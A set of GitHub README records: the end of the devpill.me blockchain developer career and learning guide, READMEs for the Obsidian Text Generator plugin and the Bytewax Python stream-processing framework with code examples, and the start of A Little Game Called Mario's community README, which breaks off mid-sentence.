teams looking to hire. The most popular way to showcase your projects is to publish them publicly on GitHub . If you don't know what to build you can look at different problems different projects are facing, try solving one of them and publishing the solution as a public repo on GitHub. You can build demo projects from sites like SpeedRunEthereum using templates like scaffold-eth, and much more. Job boards The two most used platforms to find crypto/web3 jobs are Twitter and a few select job boards. The main job boards used by recruiters and workers are: crypto.jobs cryptojobslist.com bankless job pallet web3 career cryptocurrencyjobs web3 pallet useweb3 jobs web3 board defi jobs Twitter Twitter is the place to find a blockchain development job, LinkedIn is rarely used for hiring talent in the space, although it's not too uncommon either. As most of the web3/crypto culture resides on Twitter, it is a natural place for developers, founders, creators and users to hangout together. The more value you provide to the community, the more following you'll get, therefore the more outreach as a developer. All teams are thirsty for good developers and so the more relevant followers you have, the more chances you'll get of being discovered by a team looking to hire a blockchain developer in your field of expertise. Building up your Twitter reputation can propel you forwards more than you'd expect, a lot of friendships, partnerships and collaborations have been initiated through Twitter and it is currently the place to account for social value (clout) in the space. If you manage to demonstrate mastery of any given skill within web3, then you are guaranteed a position pretty much anywhere as all teams are looking for talent. If you are just starting out, but you show a strong drive and initiative to learn then many teams will ask to take you under their wing in order to upscale your skills by getting your hands dirty and learning while building as you go. By being active on relevant social platforms like Twitter, Discord and Telegram and socializing with the right people, finding a job becomes relatively easy as everyone is looking to hire talent. Mastery Introduction This mastery section will discuss several soft skills that will help you master any skillset. It is vital not to get stuck in the wrong mindset when learning the skills required to become a great blockchain developer. It is not only about going to a few websites, reading course material, working out some problems, and building applications. Various soft skills will assist you during your journey, which often go unnoticed or are ignored. Learning how to learn Many people focus on the skillsets they need to learn and all the information they need to consume. Rarely do people stop to think twice about how to learn effectively so that every minute spent learning any course material yields maximum retention and the time effort is minimized. This section is inspired by Barbara Oakley's book Learning How to Learn. Lesson's from the book These notes are extracted from this summary of the book. I strongly recommend reading the book or taking Barbara Oakley's Coursera course . When You Find Yourself Struggling To Solve A Problem Or Learn Anything New, Try To Relax For A Few Minutes. And Then Try Again Later. Procrastination gives you instant pleasure, but it hurts you long-term and makes you highly unproductive. Think in metaphors to learn faster. Learning has no age. Even adults in their 40s or 50s can learn new stuff! Sleeping is important for your brain connections to become stronger and sturdier. Use memory palaces to remember cold hard facts Excercise is good not only for your body but also for your brain Neurons are sophisticated tiny computers in your brain Focus on different aspects while studying a new subject More resources on learning how to learn Barbara Oakley's Coursera course How to Learn Anything FASTER - Ali Abdaal How to take notes efficiently When you constantly have to consume lots of learning materials, it is tough to learn it effectively and in a way that your brain can retain it for longer. Suppose you want to master any given topic. It is good to write notes as you're learning, especially in a digital format that you can easily query and reminisce yourself about the material. If you write practical notes, your brain is forced to think about the subject and hand and more easily synthesizes the ideas and learnings. Content retention is also heightened when you take good notes since your recollection of a subject is better when focusing on the essential parts of any given learning material. A great book to improve at notetaking is: How to Take Smart Notes: One Simple Technique to Boost Writing, Learning and Thinking – for Students, Academics and Nonfiction Book Writers by Sönke Ahrens Amazon link The book is inspired by the german notetaking method zettelkasten . Core principles of How to Take Smart Notes: Writing is not the outcome of thinking; it is the medium in which thinking takes place Do your work as if writing is the only thing that matters Nobody ever starts from scratch Our tools and techniques are only as valuable as the workflow Standardization enables creativity Our work only gets better when exposed to high-quality feedback Work on multiple, simultaneous projects Organize your notes by context, not by topic Always follow the most interesting path Save contradictory ideas If you don't want to read the book, you can read a summary of it and try to apply its principles to your personal notetaking approach. - Link Next, let's explore different notetaking applications and what they are suitable for. Notion Notion is a great notetaking tool for all sorts of things. Whether it is taking notes on a topic that you are trying to master, managing complex projects with your team, creating a knowledge base, managing your daily tasks, and much more. How to use Notion Here are some external resources to learn how to use Notion. Feel free to submit a pull request to the guide or the devpill.me site with suggestions on more resources. 10X your Productivity as a Developer with Notion - Clever Programmer Notion Mastery - Marie Poulin Keep productive - YouTube Notion Civic's unplugged Notion use cases Self-Development use case: - Gary Sheng's Leadership Blueprint Roam Research Roam Research is a notetaking app that leverages the structure of graphs to synthesize and connect different notes and pieces of knowledge by referencing concepts across notes. You can link different ideas in both directions and create mind maps for anything you learn. Roam research is a subscription-based paid application ( $ '15 per month or $`165 per year). You can also apply for a scholarship to use Roam for free if you are a researcher, under 22, or experiencing financial distress ( link to apply ). It is a great way to create a structure for any learning material, whether it is about Solidity, MEV, DeFi, some protocol design, public goods, or anything else. It is a great way to reference concepts and check where else you have referenced them, and expand on each note you take. How to use Roam Research Beginner's Guide to Roam Research - Keep Productive This Note-Taking App is a Game Changer - Roam Research by Thomas Frank How to Take Better Notes With Roam Research - Lawson Blake Obsidian Obsidian is a free alternative to Roam research that hosts your graphs locally. Some add-on features or licenses can be paid for as a subscription or one-time payment for added functionality. They will also soon release hosted graphs. How to use Obsidian Your Beginner's Guide to Obsidian Inkdrop Inkdrop is a Markdown notetaking application that is highly extensible and focuses on developers. I use it to write all of my articles and the devpill.me guide and my article on L2s , and some other pieces. I use the Vim extension for writing using Vim keybindings ; I also use the LaTeX extension to occasionally write math equations and some other plugins for modifying how the application looks. There is a 30-day free trial for the application. Otherwise, it costs $ '50 per year or $`6 per month. Others For more applications, check out this article from College Info Geek comparing different notetaking apps Mentorship Having guidance is extremely important to grow as rapidly as possible and make the most effective use of your time. I want to share some of the lessons I have learned over the past four years of researching blockchain development and web3. I don't want new developers to feel as overwhelmed by the number of possibilities and lack of structured guidance as I did. In the crypto and broader web3 ecosystems, thought leaders spearhead different missions, values, and goals and drive the industry forward. When you are just starting out, following these leaders and analyzing how they reached their position is an excellent way to understand what you need to do to achieve your own goals within a particular field. If you are interested in creating useful DeFi primitives, then you have to analyze exemplary founders and builders of current as well as the up and coming DeFi protocols; good examples include Hayden Adams (Uniswap), Stani Kulechov (Aave), Robert Leshner (Compound), @scupytrooples (Alchemix), etc. EthernautDAO EthernautDAO is a community of builders that tries to convert developers from other fields into blockchain developers through mentorship programs. There are two main types of members in EtheurnautDAO: mentors and mentees (students). Mentors come from different established protocols, DAOs, projects, and companies in the industry and are looking to train and hire skilled developers. The process is relatively simple: a mentor posts an opening for a specific type of mentorship. Students apply. If they get accepted, they get mentorship and often either compensation or the chance to get hired by the company the mentor belongs to. Twitter The leading platform for news, discourse, education, and interaction within the web3 space is Twitter. Almost everyone interacts on Twitter, and so as someone looking to learn and get mentorship, it is a great place to try and get hired (take a look at the Getting a job section ) and accrue social capital . As you build a portfolio that showcases your skills, it will act as your reputation in the space. You can leverage that reputation on Twitter to start working on different projects (getting a job) or interacting with skilled individuals who are generally very willing to help people learn and become better (great to get mentorship). Development bootcamps Another option for getting valuable guidance is finding a community of people going through the same challenges you are. You will gain access to experienced builders, excellent educational materials, and more development bootcamps and e-learning platforms like the ones listed below. A non-exhaustive list of learning platforms: Buildspace (free) [Cadena] (https://cadena.dev/) (free) Encode club (paid) Consensys Academy (expensive bootcamp) BuidlGuidl (free) Learn Web3 (free) Affiliated (I, dcbuilder, am an advisor): Artemis (free / income sharing) Crystalize (income sharing) Mastery Mastery of a craft can only be achieved when individuals hone their skills to the utmost and become competent experts. To acquire knowledge of a specific skillset, the individual needs to devote a lot of time and concentrated effort to learn as many intricacies, nuances, and details about their craft. They also need to assimilate that information into their abilities to wield the art necessary to perform it. They need to constantly keep up with the pace of development within that craft to retain their state-of-the-art skills. The context of blockchain development involves: Keeping up with the current standard development stacks. Looking into newly emerging technologies. Developing a deep understanding of the field to critically assess the pros and cons of using a specific technology or architecture. Many principles behind mastery and the journey of achieving peak human performance are studied in various areas of study like neurology (for learning-related matters), psychology, physiology, social sciences, self-development studies, and more. A good entry book that has remained relevant for decades is Robert Green's book 'Mastery'. It details the steps that the most capable people have abided by to achieve greatness and mastery of their craft throughout human history. You can find a good summary of the book's principles here . The main sections of the book are: Discovering Your Calling Submit to Reality: The Ideal Apprenticeship Absorb the Master's Power: The Mentor Dynamic See People as they Are: Social Intelligence Awaken the Dimensional Mind: The Creative-Active Fuse the Intuitive with the Rational: Mastery Becoming a master of blockchain development or its specializations is a never-ending process. However, the possibilities for what you can create are endless, and all of its skillsets are highly valuable and sought after. I'm personally excited about what the masters of the future will be able to build and how that will enable the future of human coordination, public goods, and regenerative crypto-economics. Rationality Rationality is the quest of trying to find the truth systematically. A great book about rationality is ' Rationality: From AI to Zombies ' by Eliezer Yudkowsky (thank you, Rai , for the recommendation). From the book: "When we talk about rationality, we're generally talking about either epistemic rationality (systematic methods of finding out the truth) or instrumental rationality (systematic methods of making the world more like we would like it to be). We can discuss these in the forms of probability theory and decision theory, but this doesn't fully cover the difficulty of being rational as a human. There is a lot more to rationality than just the formal theories." The book is comprised of 6 smaller sections: - Book I: Map and Territory - Book II: How to Actually Change Your Mind - Book III: The Machine in the Ghost - Book IV: Mere Reality - Book V: Mere Goodness - Book VI: Becoming Stronger You can read the sections sequentially as they originally come from blogposts he wrote. Each section goes through different areas of rationality. Time management Time management is vital to becoming an efficient developer, especially in crypto / web3, where there are so many distractions and shiny objects that it is hard to focus on essential tasks. Planning Planning your days ahead of time is essential to maximize productivity as a developer, especially if you are a freelancer or don't have a robust synchronous structure within your organization. Since many web3 developers work remotely and teams coordinate asynchronously using tools like GitHub, Zoom / Google Meets, etc. It is essential to book the times you will spend working on a particular task or area. I'd recommend planning your day the day before and filling all the necessary tasks as you need them. You will get better at planning the more you do it, as you'll be able to see how it works for you and what things you need to polish out. I try to schedule everything, from travels to bookings, personal affairs, periods for exercising, eating, reading, learning, working, events, calls, meetings, etc. I spent way too much time procrastinating and just going through the motions, and if I had a system to use my time efficiently, I would not have lost so much time in vain. I've recently started using Cron , a calendar interface that can hook up to Google accounts. The application aggregates all of your connected Google accounts' calendars. It sends notifications for meetings early, the UI/UX is impressive, booking new events is very intuitive, and it allows you to send invites from any account. For scheduling meetings, I recommend using Calendly or similar services that allow you to give other people links with pre-filled slots with your availability. The people you want to meet with can use to book a specific time with you; the event will subsequently appear in your calendar app of choice. To get deeper into planning/scheduling and developing high performance, I recommend reading these two books, which are my personal favorites: The Power of Habit - Charles Duhigg High Performance Habits - Brendon Burchard Project management As a software developer, you're going to work with many different people when you join a team or try to build a product yourself - from designers, front/back end devs, DevOps, data engineers to lawyers, product managers, etc. There will be systems set in place in the most mature developer environments to coordinate as an organization. Popular methods are Agile and SCRUM . Popular apps for managing all of these processes, tasks, and interactions include tools like Asana, Linear, Jira, Trello, Notion, etc. Self-development To reach your peak, you need to create a sustainable set of habits that will allow you to keep working hard consistently. Since we are all human beings, we need to keep our bodies in check, as they are the hosts for our brains responsible for producing bug-free code. Note that this section is not professional advice as I am not an expert in these fields, and I am not a licensed advisor. If you want guidance in any areas covered, please consult with an expert trainer, nutritionist, therapist, coach, etc. Working out Exercise is an integral part of life as it allows the body to maintain physical fitness, health, and overall wellness. Developers are usually portrayed in modern culture as people who do not exercise very often, as sedentary people who sit on a chair all day and do not prioritize their health. It is essential to be active throughout the day even though we are programming most of the time. I recommend using a standing desk that you can adjust for any height. You can stand up and keep coding when you are tired of sitting. Some individuals also get a small walking board underneath the table to walk while coding. Another good technique is a slight modification of the Pomodoro technique that replaces the break period with a short exercise period. The most prevalent version consists of 45 minutes of focused work and a 15-minute workout. I like to alternate activities during the workout period. Other positive effects of exercising are clearer thinking as the brain has more oxygen inflow, stronger immune, cardiovascular system, and more. For more guidance on achieving physical fitness and what exercises to do, please consult with an expert. Nutrition Nutrition is an area that is very easy to overlook, especially when an individual is young and their metabolism can deal with living an unhealthy lifestyle. Eating the right amounts of food within a varied diet is an integral part of a healthy lifestyle, and everyone should take it seriously. For more information, please consult with a nutritionist or dietary expert or do your research as nutrition varies a lot per individual, and I'm not qualified to give advice. Other Self-development is a very wide topic and there's a lot more to improve than health, fitness and nutrition. You can improve your mindset, define your own values and create systems that will allow you to uphold those values as you go about life, there's spiritual discovery, learning about various aspects of life, etc. Most of these other topics although significant do not have a direct impact on your performance as a developer, so I'll refrain from talking about them. Feel free to suggest any changes to this section via GitHub pull request. Social Capital Introduction Social capital expresses how much influence you have within social circles, good metrics to denominate social capital in are: relevant followers across social platforms within the industry reputation formed by building, creating, contributing to the space friends in the space that will help you grow, that you can learn from, that you can rely on, that you can discuss your ideas with and get constructive criticism from. connections with people that can introduce you or vouch for you in different situations etc There's various methods to accrue social capital which will be talked about within this guide and will be expanded upon over time. Most consist in outputting relevant content, networking and interacting with people in the space, building products, contributing to the ecosystem in different ways, providing value (or fun), and many other methods. In order to meet 'good' people in the space you also need to spend your time in the right places and doing the right things, this guide will help you streamline your focus and save time by not wasting it in places where people are not listening or places which are used to achieve different goals from accruing social capital. Another important aspect of accruing social capital is putting out content which other people find interesting, engaging, relevant or valuable. As a developer in the space, your content should provide valuable to other people within the space: to developers, and other people wanting to get a more technical overview of the field/products/projects you're working on. There's also lots of potential to accrue social capital by creating educational resources like trivia, fun facts, guides, tutorials, reviews, talks, discussions, debates, etc. A good example of this is devpill.me itself, where me (dcbuild3r) contributing content to this public good guide helps others know about me and that I'm creating a resource that is benefiting anyone, people who are interested in learning about blockchain development follow me. How to leverage social platforms to grow as a developer The most relevant platforms to interact with people in the space are: Twitter Twitter is used to write short form content that either redirects to long form content like Medium, Mirror, Substack, ... articles or it is content short enough to fit in a few tweets unless you write a 206-tweet long tweet (in which case @thereaderapp is useful to make long tweets readable). Telegram Telegram is a single threaded chatting platform which is generally used for simple group chats and newsletters in crypto, as a developer there are a few groups which you can follow within your specific realm of interest or create group chats with friends in order to discuss various topics, create a learning group for a programming language, protocol, or topic, and more. Telegram is good for simple one-thread conversations where you don’t need to manage asynchronous communication. Discord Discord groups are useful once you have a big community, DAO, or friend group which you want to participate in. For developers there are various good groups like Buildspace, Developer DAO, and others. It is also used by different teams to manage contributions to an application, protocol or service. So for example if you become a contributor to an open-source project like Aave and you want to recommend a change to one of its open codebases and the change gets accepted, the coordination, and all the processes usually go through Discord. Many projects also help new contributors get started with building with a project and if you are learning something new it is a good place to ask technical questions. Real life events Although not available to everyone there are events hosted all around the world where people from different communities within web3 and crypto gather together in order to organize conferences, hackathons, parties, meetups, talks and more. Real life events are one of the best places to find like-minded people to become friends with, to get hired, to network with other interesting people in the space, to learn, to build new projects at hackathons and push your own boundaries, etc. It is underrated just how much you can grow as a developer if you surround yourself with people that have the same properties that you want to acquire for yourself. The people around you can push you to grow and take you to new heights as they expose you to new challenges and help you along the way. Who to interact with When you are on the social platforms mentioned above you should target the people that help you grow, and make connections with them. experts in your preferred field of interest If you talk to people with expertise in the fields that you want to become skilled in, then you’ll have a much easier time learning them, you’ll get good connections that will propel you forward in your career and you will also most likely have more opportunities and resources to grow as a developer by getting hired, getting tips on how to learn about your specialization field efficiently and more! people trying to learn the same things you are learning It is good to share ideas and have two way feedback on any topic you are learning from other people learning the same material you are, especially if they are more experienced than you are. Another good reason to learn in groups (ideally pairs) is that teaching is the best way to solidify your own knowledge as when you have to explain a complex topic simply, you need to have a good understanding of any given topic so that you are capable of explaining it. More on this in the Mastery section. people building other primitives in the web3/crypto space (expand horizons) As someone trying to learn more about blockchain development, especially when you are starting out, it is great to explore at the beginnning and try many different things before you start specializing in any given field of development. That's why you should follow the most proficient people in different fields in order to get a bird's eye view of the space. Also I recommend reading over other sections within devpill.me so that you can see what is out there to learn. What content to put out In order to amass social capital, putting out good content out into different popular social platforms is crucial as people like to follow individuals and groups that they can get value from. E.g.: if you start talking about building in DeFi, then individuals interested in DeFi will start to follow you, like and retweet your posts, engage to conversations in comments, etc. As a blockchain developer in any specialization there's different ways in which you can provide interesting content and distribute it across different social platforms. document > create at the beginning When you start out as a blockchain developer you usually won't have any novel findings, cool things that you are building or projects you are working on, so it is good to share your own learning proccess and your journey becoming a blockchain developer. talk about your learnings in your journey: It is good to talk about different resources you are using to learn the topics you are interested in, share it with others and tell them how it has helped you learn about a specific topic, also provide commentary and helpful tips which might be missed by people only skimming through the resources and haven't gone into depth. talk about the tools you use: Developers love to talk about their tooling, what libraries they use, what IDE and extensions they use to write code, what services, and applications they use on a daily basis to organize themselves and be productive, and much more. ask questions about the things you are learning: chances are that many people following you have had the same questions as you in the past and they can provide you with a lot of helpful insight about any given topic be active in threads in that are relevant to your interests: if there relevant events happening within the space that you are interested in, it is a good idea to engage in public discourse with other people around those events in order to get a better overview of what's happening and to try to extract valuable information / learnings out of it retweet things that happen within your field of interest with commentary / opinions summarize articles, talks, events, updates, discuss code within the projects / fields that interest you. shitpost (express your own personality / be yourself) for engagement (grows your network whilst having fun): Be creative, development doesn't need to be everything you talk about, many also use social platforms to make friends and have fun, so you can also do funny content, light-hearted threads on any given topic, post pictures of your dog, or whatever you want. Expressing your own individuality is also useful to create your own personal brand on socials. Conclusion Thank you for checking out the blockchain development guide, if there is any content you'd like to see getting added, please check out the contributors section and suggest it there. The goal is to make this guide and devpill.me the best blockchain development guide out there. Thank you for your support. Special thanks Special thanks to all the contributors: @protolambda - author of the Ethereum core development section @0xjepsen - author of the cryptography section;Devpill.me - A Public Good Blockchain Development Guide;ethereum,blockchain-development,solidity,full-stack,decentralized-finance,mev
dcbuild3r/blockchain-development-guide
nhaouari/obsidian-textgenerator-plugin;obsidian-textgenerator-plugin Documentation • Discord • Twitter What is Text Generator? Text Generator is an open-source AI Assistant Tool that brings the power of Generative Artificial Intelligence to the power of knowledge creation and organization in Obsidian. For example, use Text Generator to generate ideas, attractive titles, summaries, outlines, and whole paragraphs based on your knowledge database. The possibilities are endless! If you're looking for a place to discuss the use cases of this plugin and share your experiences, head over to our Discord Server (Updated) or the Discussion . There, you'll find a community of like-minded users who are eager to help you make the most of this powerful tool. Features There are many benefits to using a Text Generator Plugin, including the following: Free and Open Source : The Text Generator Plugin is free and open source, so you can use it without worrying about licensing fees. Beside Obsidian : Obsidian is very powerful and extensible Personal Knowledge Management software so you can use Text Generator Plugin alongside Obsidian to create a more powerful Personal Knowledge Management system. Flexible Prompts : The context of the prompt is straightforward using all the available options in the Considered Context which gives you a higher filexibilty. Template Engine : You can create templates to make repetitive tasks more manageable. Community Templates : Through this option you can discover new use cases of Generative Artificial Intelligence using the shared templates and you can share your use cases easier. Highly Flexible Configuration : Using Frontmatter Configuration, it is possible to use different services such as Google Generative AI(contains Gemini-Pro ), OpenAI, HuggingFace ...etc. Demonstration;Text generator is a handy plugin for Obsidian that helps you generate text content using GPT-3 (OpenAI).;obsidian,obsidian-plugin,plugin,gpt-3,huggingface,nlg,openai,ai,writing,writing-tool
nhaouari/obsidian-textgenerator-plugin
bytewax/bytewax;Python Stateful Stream Processing Framework Bytewax is a Python framework that simplifies event and stream processing. Because Bytewax couples the stream and event processing capabilities of Flink, Spark, and Kafka Streams with the friendly and familiar interface of Python, you can re-use the Python libraries you already know and love. Connect data sources, run stateful transformations and write to various different downstream systems with built-in connectors or existing Python libraries. How it all works Bytewax is a Python framework and Rust distributed processing engine that uses a dataflow computational model to provide parallelizable stream processing and event processing capabilities similar to Flink, Spark, and Kafka Streams. You can use Bytewax for a variety of workloads from moving data à la Kafka Connect style all the way to advanced online machine learning workloads. Bytewax is not limited to streaming applications but excels anywhere that data can be distributed at the input and output. Bytewax has an accompanying command line interface, waxctl , which supports the deployment of dataflows on cloud servers or Kubernetes. You can download it here . Getting Started with Bytewax sh pip install bytewax Install waxctl Dataflow, Input and Operators A Bytewax dataflow is Python code that will represent an input, a series of processing steps, and an output. The inputs could range from a Kafka stream to a WebSocket and the outputs could vary from a data lake to a key-value store. ```python import json from bytewax import operators as op from bytewax.connectors.kafka import operators as kop from bytewax.dataflow import Dataflow ``` Bytewax has input and output helpers for common input and output data sources but you can also create your own with the Sink and Source API . At a high-level, the dataflow compute model is one in which a program execution is conceptualized as data flowing through a series of operator-based steps. Operators like map and filter are the processing primitives of Bytewax. Each of them gives you a “shape” of data transformation, and you give them regular Python functions to customize them to a specific task you need. See the documentation for a list of the available operators ```python BROKERS = ["localhost:19092"] IN_TOPICS = ["in_topic"] OUT_TOPIC = "out_topic" ERR_TOPIC = "errors" def deserialize(kafka_message): return json.loads(kafka_message.value) def anonymize_email(event_data): event_data["email"] = "@".join([" * *", event_data["email"].split("@")[-1]]) return event_data def remove_bytewax(event_data): return "bytewax" not in event_data["email"] flow = Dataflow("kafka_in_out") stream = kop.input("inp", flow, brokers=BROKERS, topics=IN_TOPICS) we can inspect the stream coming from the kafka topic to view the items within on std out for debugging op.inspect("inspect-oks", stream.oks) we can also inspect kafka errors as a separate stream and raise an exception when one is encountered errs = op.inspect("errors", stream.errs).then(op.raises, "crash-on-err") deser_msgs = op.map("deserialize", stream.oks, deserialize) anon_msgs = op.map("anon", deser_msgs, anonymize_email) filtered_msgs = op.filter("filter_employees", anon_msgs, remove_bytewax) processed = op.map("map", anon_msgs, lambda m: KafkaSinkMessage(None, json.dumps(m))) and finally output the cleaned data to a new topic kop.output("out1", processed, brokers=BROKERS, topic=OUT_TOPIC) ``` Windowing, Reducing and Aggregating Bytewax is a stateful stream processing framework, which means that some operations remember information across multiple events. Windows and aggregations are also stateful, and can be reconstructed in the event of failure. Bytewax can be configured with different state recovery mechanisms to durably persist state in order to recover from failure. There are multiple stateful operators available like reduce , stateful_map and fold_window . The complete list can be found in the API documentation for all operators . Below we use the fold_window operator with a tumbling window based on system time to gather events and calculate the number of times events have occurred on a per-user basis. ```python from datetime import datetime, timedelta, timezone from bytewax.dataflow import Dataflow import bytewax.operators.windowing as win from bytewax.operators.windowing import EventClock, TumblingWindower from bytewax.testing import TestingSource flow = Dataflow("window_eg") src = [ {"user_id": "123", "value": 5, "time": "2023-1-1T00:00:00Z"}, {"user_id": "123", "value": 7, "time": "2023-1-1T00:00:01Z"}, {"user_id": "123", "value": 2, "time": "2023-1-1T00:00:07Z"}, ] inp = op.input("inp", flow, TestingSource(src)) keyed_inp = op.key_on("keyed_inp", inp, lambda x: x["user_id"]) This function instructs the event clock on how to retrieve the event's datetime from the input. Note that the datetime MUST be UTC. If the datetime is using a different representation, we would have to convert it here. def get_event_time(event): return datetime.fromisoformat(event["time"]) Configure the fold_window operator to use the event time. clock = EventClock(get_event_time, wait_for_system_duration=timedelta(seconds=10)) And a 5 seconds tumbling window align_to = datetime(2023, 1, 1, tzinfo=timezone.utc) windower = TumblingWindower(align_to=align_to, length=timedelta(seconds=5)) five_sec_buckets_win_out = win.collect_window( "five_sec_buckets", keyed_inp, clock, windower ) def calc_avg(bucket): values = [event["value"] for event in bucket] if len(values) > 0: return sum(values) / len(values) else: return None five_sec_avgs = op.map_value("avg_in_bucket", five_sec_buckets_win_out.down, calc_avg) ``` Merges and Joins Merging or Joining multiple input streams is a common task for stream processing, Bytewax enables different types of joins to facilitate different patters. Merging Streams Merging streams is like concatenating, there is no logic and the resulting stream will potentially include heterogeneous records. ```python from bytewax import operators as op from bytewax.connectors.stdio import StdOutSink from bytewax.dataflow import Dataflow from bytewax.testing import TestingSource flow = Dataflow("merge") src_1 = [ {"user_id": "123", "name": "Bumble"}, ] inp1 = op.input("inp1", flow, TestingSource(src_1)) src_2 = [ {"user_id": "123", "email": "bee@bytewax.com"}, {"user_id": "456", "email": "hive@bytewax.com"}, ] inp2 = op.input("inp2", flow, TestingSource(src_2)) merged_stream = op.merge("merge", inp1, inp2) op.inspect("debug", merged_stream) ``` Joining Streams Joining streams is different than merging because it uses logic to join the records in the streams together. The joins in Bytewax can be running or not. A regular join in streaming is more closely related to an inner join in SQL in that the dataflow will emit data downstream from a join when all of the sides of the join have matched on the key. ```python from bytewax import operators as op from bytewax.connectors.stdio import StdOutSink from bytewax.dataflow import Dataflow from bytewax.testing import TestingSource flow = Dataflow("join") src_1 = [ {"user_id": "123", "name": "Bumble"}, ] inp1 = op.input("inp1", flow, TestingSource(src_1)) keyed_inp_1 = op.key_on("key_stream_1", inp1, lambda x: x["user_id"]) src_2 = [ {"user_id": "123", "email": "bee@bytewax.com"}, {"user_id": "456", "email": "hive@bytewax.com"}, ] inp2 = op.input("inp2", flow, TestingSource(src_2)) keyed_inp_2 = op.key_on("key_stream_2", inp2, lambda x: x["user_id"]) merged_stream = op.join("join", keyed_inp_1, keyed_inp_2) op.inspect("debug", merged_stream) ``` Output Output in Bytewax is described as a sink and these are grouped into connectors . There are a number of basic connectors in the Bytewax repo to help you during development. In addition to the built-in connectors, it is possible to use the input and output API to build a custom sink and source. There is also a hub for connectors built by the community, partners and Bytewax. Below is an example of a custom connector for Postgres using the psycopg2 library. % skip: next ```python import psycopg2 from bytewax import operators as op from bytewax.outputs import FixedPartitionedSink, StatefulSinkPartition class PsqlSink(StatefulSinkPartition): def init (self): self.conn = psycopg2.connect("dbname=website user=bytewax") self.conn.set_session(autocommit=True) self.cur = self.conn.cursor() def write_batch(self, values): query_string = """ INSERT INTO events (user_id, data) VALUES (%s, %s) ON CONFLICT (user_id) DO UPDATE SET data = %s; """ self.cur.execute_values(query_string, values) def snapshot(self): pass def close(self): self.conn.close() class PsqlOutput(FixedPartitionedSink): def list_parts(self): return ["single"] def build_part(step_id, for_part, resume_state): return PsqlSink() ``` Execution Bytewax dataflows can be executed in a single Python process, or on multiple processes on multiple hosts with multiple worker threads. When processing data in a distributed fashion, Bytewax uses routing keys to ensure your state is updated in a correct way automatically. ```sh a single worker locally python -m bytewax.run my_dataflow:flow Start two worker threads in a single process. python -m bytewax.run my_dataflow -w 2 Start a process on two separate machines to form a Bytewax cluster. Start the first process with two worker threads on machine_one . machine_one$ python -m bytewax.run my_dataflow -w 2 -i0 -a "machine_one:2101;machine_two:2101" Then start the second process with three worker threads on machine_two . machine_two$ python -m bytewax.run my_dataflow -w 3 -i1 -a "machine_one:2101;machine_two:2101" ``` It can also be run in a Docker container as described further in the documentation . Kubernetes The recommended way to run dataflows at scale is to leverage the kubernetes ecosystem . To help manage deployment, we built waxctl , which allows you to easily deploy dataflows that will run at huge scale across multiple compute nodes. sh waxctl df deploy my_dataflow.py --name my-dataflow Why Bytewax? At a high level, Bytewax provides a few major benefits: The operators in Bytewax are largely “data-parallel”, meaning they can operate on independent parts of the data concurrently. Bytewax offers the ability to express higher-level control constructs, like iteration. Bytewax allows you to develop and run your code locally, and then easily scale that code to multiple workers or processes without changes. Bytewax can be used in both a streaming and batch context Ability to leverage the Python ecosystem directly Community Slack is the main forum for communication and discussion. GitHub Issues is reserved only for actual issues. Please use the community Slack for discussions. Code of Conduct More Examples For a more complete example, and documentation on the available operators, check out the User Guide and the /examples folder. License Bytewax is licensed under the Apache-2.0 license. Contributing Contributions are welcome! This community and project would not be what it is without the contributors . All contributions, from bug reports to new features, are welcome and encouraged. Please view the Contribution Guide for how to get started. With ❤️ Bytewax;Python Stream Processing;python,stream-processing,rust,data-engineering,data-processing,data-science,dataflow,machine-learning,streaming-data
bytewax/bytewax
a-little-org-called-mario/a-little-game-called-mario;A Little Game Called Mario open source collective hell game a bad idea from the mind of izzy kestrel , inspired by Aaron San Filippo 🎮 play the latest version here 🎮 🗣 join the discord server (by joining our discord you are agreeing to abide by our code of conduct ) 🗣 about this is (at least to start), a simple 2D platformer game made with Godot Engine. it exists for all to enjoy - not only as players, but also as Game Developers. finally, we can put the discourse to rest. are you a Game Developer? no? why not? all you have to do is make some changes to this project. it's that simple. will you add some art? some music? some new gameplay mechanics? dialog? robust multiplayer functionality with rollback netcode? it's up to you. your contributions are valuable regardless of how experienced you are or where your strengths lie. even if you never touch a line of code, you're still valuable as a player who can spot things that are wrong and reporting them for others to fix. i would even go so far as to say you're still a Game Developer by simply playtesting and providing QA support - games wouldn't exist without those people! this is a game that will live or die by its ability to capture a collective imagination and i like to believe that people can do some pretty amazing things when they organize together under a common goal. so the next time someone asks, "oh, you're a game developer?" you can proudly say: "yes. i worked on A Little Game Called Mario. heard of it?" rules be kind, respectful, and have empathy for your players and fellow developers. this means: adding content that improves the player's experience adding comments/tools/utilities that make it easier for less experienced developers to contribute removing content that is racist, homophobic, transphobic, ableist, or any other number of things that diminish the work and make it less accessible to anyone who might want to play or contribute to it your contributions should be additive whenever possible. this is not your game, it is everyone's game. if you believe changing/removing existing features could improve the game, that's great! but please try to get in touch with the people who originally made those choices and see if you can collaborate rather than disregard their hard work. assume their contributions were made with just as much intentionality as yours and should be just as valued. don't be shy about talking to new people, be it to collaborate or just to ask for help! you're all here for the same reason: to make a game. the whole point is collaboration and making new friends. please read through our code of conduct ! contributing there are many ways to contribute to the project! games are complex things with a lot of moving parts that only exist because collaboration between creative and technical disciplines makes that happen. here are just a few ways you might be able to help out: 🎨 if you're the creative type 🎨 make something! anything! it doesn't need to be perfect or polished and it certainly doesn't have to be hooked up via code right away! leave a little gift for the more technical/design-minded folks - their eyes will light up as they think of a dozen different ways it could be implemented as a weird new power-up or something. learn more about submitting assets ⚙️ if you're the technical type ⚙️ see if there are any open issues to work on! these can range from bug reports to feature requests and some of them may even be tagged as a "good first issue" for new folks. you can also dig around in closed issues and check out what people are actively working on in pull requests. learn more about making code changes 🤔 don't forget the designer types! 🤔 i think these folks get a bad rap (not just saying that bc i'm one of them!!) - design is important and even tho you can't throw a rock without hitting someone with a "good game idea", what you may not appreciate is how hard it actually can be to execute on! and i'm not talking about learning to code or create art to support your vision....we have plenty of folks here who are already experts at those things! but at the same time, those same folks may not think about problems in the same creative way that you do. check out the discussions and issues to see if there are any conversations you might be able to contribute to and don't forget to join our discord to see what other folks are talking about! 🎮 about the game engine 🎮 Godot Engine is a free and open-source tool for making video games. Check out this video for a very quick primer: The Godot Game Engine Explained in 5 Minutes you can download Godot here: - Windows - Mac OS X - Linux this project was created with v3.4.4 - if you have an older version installed, we recommend upgrading to avoid compatibility issues during development Godot is relatively easy to learn but can be fairly powerful. the documentation is very good and includes some helpful resources: - Getting Started - Your First 2D Game - Tutorials and resources if videos are more your thing, i recommend these channels: - GDQuest - Godot Tutorials this video was used as reference to create the framework for this project: Make your first 2D platformer game IN JUST 10 MINUTES this is all rad but i'm still intimidated 😱 i could go on for hours about impostor syndrome and all 